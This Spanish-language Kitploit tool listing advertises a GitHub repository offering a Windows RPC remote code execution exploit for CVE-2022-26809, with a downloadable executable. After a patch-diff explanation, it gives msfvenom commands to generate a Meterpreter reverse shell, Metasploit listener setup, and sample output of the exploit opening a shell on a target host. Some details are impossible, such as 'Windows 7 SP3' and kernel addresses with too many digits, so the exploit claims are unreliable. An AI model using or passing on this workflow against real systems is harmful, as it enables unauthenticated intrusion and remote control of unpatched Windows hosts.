Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26810 | Kitploit
Herramientas/GitHubGitHub/mr-alperen/cve-2022-26810
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePost-ExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso RemotoExplotación de Binarios
GitHubmr-alperen/cve-2022-26810

CVE-2022-26810

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE CVE-2022-26809

Descripción de la CVE

La CVE-2022-26809 es una debilidad en un componente central de Windows (RPC) que obtuvo una puntuación CVSS de 9.8 no sin razón, ya que el ataque no requiere autenticación y puede ejecutarse remotamente a través de la red, y puede resultar en la ejecución remota de código (RCE) con los privilegios del servicio RPC, lo cual depende del proceso que aloja el runtime de RPC. Ese bug crítico, con un poco de suerte, permite obtener acceso a un host Windows sin parchear que ejecute SMB. La vulnerabilidad puede explotarse tanto desde fuera de la red para vulnerarla como entre máquinas dentro de la red.

Información del proveedor

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809

  • https://www.pwndefend.com/2022/04/14/cve-2022-26809/

¿Quién es vulnerable?

Hosts vulnerables probados:

  • Windows 10 Pro Build 10.0.10240 x64
  • Windows 10 Pro Build 10.0.19042 x64
  • Windows 10 Pro Build 10.0.19044 x64
  • Windows Server 2019 x64
  • Windows Server 2022 x64
  • Windows 7 SP3 x64

Actualizaremos esa lista más adelante. Sospechamos que casi todas las compilaciones con SMB en ejecución y el puerto 445 abierto se verán afectadas.

Puerto RPC

root@kitploit:~
TCP 135,139,445

Localizando la vulnerabilidad

La CVE afirmó que las vulnerabilidades residen en el runtime de RPC de Windows, implementado en una biblioteca llamada rpcrt4.dll. Esta biblioteca de runtime se carga tanto en procesos cliente como servidor que utilizan el protocolo RPC para la comunicación. Comparamos las versiones 10.0.22000.434 (marzo) y 10.0.22000.613 (parcheada) y señalamos una lista de cambios.

Las funciones OSF_SCALL::ProcessResponse y OSF_CCALL::ProcessReceivedPDU son de naturaleza similar; ambas procesan paquetes RPC, pero una se ejecuta en el lado del servidor y la otra en el lado del cliente (SCALL y CCALL). Al hacer diff de OSF_SCALL::ProcessReceivedPDU, notamos dos bloques de código que se añadieron en la nueva versión.

pic2

pic3_new

Al observar el código parcheado, vimos que después de QUEUE::PutOnQueue se llamaba a una nueva función. Inspeccionando la nueva función y profundizando en su código, descubrimos que verifica desbordamientos de enteros. En otras palabras, la nueva función del parche se añadió para verificar que una variable entera se mantuviera dentro de un rango de valores esperado.

pic1

Profundizando en el código vulnerable de OSF_SCALL:GetCoalescedBuffer, notamos que el error de desbordamiento de enteros podría conducir a un desbordamiento de búfer en el heap, donde los datos se copian en un búfer demasiado pequeño para contenerlos. Esto a su vez permite que se escriban datos fuera de los límites del búfer, en el heap. Cuando se explota, esta primitiva nos lleva a la ejecución remota de código.

También se añadió una llamada similar para verificar el desbordamiento de enteros en otras funciones:

OSF_CCALL::ProcessResponse OSF_SCALL::GetCoalescedBuffer OSF_CCALL::GetCoalescedBuffer

La vulnerabilidad de desbordamiento de enteros y la función que la previene existen tanto en los flujos de ejecución del lado del cliente como del lado del servidor.

Exploit

paso 1

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.105 LPORT=4444 -f raw > shellcode.bin

paso 2

root@kitploit:~
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.10.105
LHOST => 192.168.10.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

Exploit

CVE-2022-26809 ip puerto

root@kitploit:~
C:\>CVE-2022-26809.exe 192.168.10.110 445
CVE-2022-26809 RPC Remote Exploit
[+] Checking... 192.168.10.110 445
[+] 192.168.10.110 445 IsOpen
[+] found low stub at phys addr 6800!
[+] Pipe at 4ac660
[+] base of RPC heap at fffff79480048033
[+] ntoskrnl entry at fffff802435782060
[+] found Pipe self-ref entry 1eb
[+] found Alsr at fffff64480301671
[+] found RPC CALL at fffff802451b3b30
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff4ffc0033060
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff75006070a023!
[+] Try to execute shellcode!
[ ] Exploit Suceess!
Descargar herramienta